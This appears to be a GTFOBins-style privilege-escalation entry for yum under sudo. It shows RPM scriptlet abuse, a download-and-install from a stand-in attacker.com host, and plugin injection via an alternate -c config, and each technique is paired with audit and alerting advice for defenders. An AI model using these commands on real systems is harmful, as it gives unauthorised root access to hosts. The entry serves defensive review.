yum

Command Execution

Context: sudo

# Installs the RPM file named on the command line; -y answers "yes" to every
# prompt, so no confirmation step remains.
# RPM scriptlets execute inside the yum/rpm transaction, so when yum is
# reachable through sudo, whoever supplies the package file gets its scriptlets
# run as root. A sudoers entry for yum is therefore equivalent to a root shell.
# Review points: signature checking for local package files is controlled by
# the localpkg_gpgcheck option in yum.conf (confirm its value on the host);
# audit sudoers for yum entries without fixed arguments; alert on
# localinstall/install of .rpm files located in user-writable directories.
yum localinstall -y x-1.0-1.noarch.rpm

Download

Context: sudo

# Passing a URL instead of a package name makes yum fetch the RPM from that
# host and then install it. The scheme here is plain http, so the transfer has
# no transport integrity or origin authentication.
# Under sudo both the fetch and the install run as root, which gives the caller
# a root-owned download channel as well as a package install.
# Review points: log and alert on yum command lines that contain a URL
# argument; watch for package-manager processes connecting to hosts that are
# not configured repositories; limit egress from hosts where yum runs.
yum install http://attacker.com/path/to/input-file.rpm

Inherit

Context: sudo

# Step 1: write an alternate yum configuration file. It switches plugins on and
# points both the plugin code directory (pluginpath) and the plugin config
# directory (pluginconfpath) at a location the caller controls.
# The heredoc delimiter is unquoted, so the shell would expand $ and backticks
# in the body; none are present in any of the three heredocs below.
cat >/path/to/temp-dir/x<<EOF
[main]
plugins=1
pluginpath=/path/to/temp-dir/
pluginconfpath=/path/to/temp-dir/
EOF

# Step 2: per-plugin configuration for a plugin named "y"; enabled=1 marks it
# as active. The file name (y.conf) matches the plugin module written next.
cat >/path/to/temp-dir/y.conf<<EOF
[main]
enabled=1
EOF

# Step 3: the plugin itself, a Python module. yum imports it from pluginpath
# and calls init_hook(conduit) in its own process, so whatever the hook body
# contains runs with yum's privileges. The body is elided ("...") on this page.
cat >/path/to/temp-dir/y.py<<EOF
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  ...
EOF

# Step 4: -c replaces the system configuration with the file from step 1 and
# --enableplugin=y names the plugin to load. Under sudo the plugin code runs as
# root without any package being installed.
# Review points: a sudoers rule for yum cannot be made safe by restricting
# package names alone, because -c redirects where yum looks for plugin code.
# Alert on yum invoked with -c or --enableplugin, and on pluginpath or
# pluginconfpath values that point into user-writable directories.
yum -c /path/to/temp-dir/x --enableplugin=y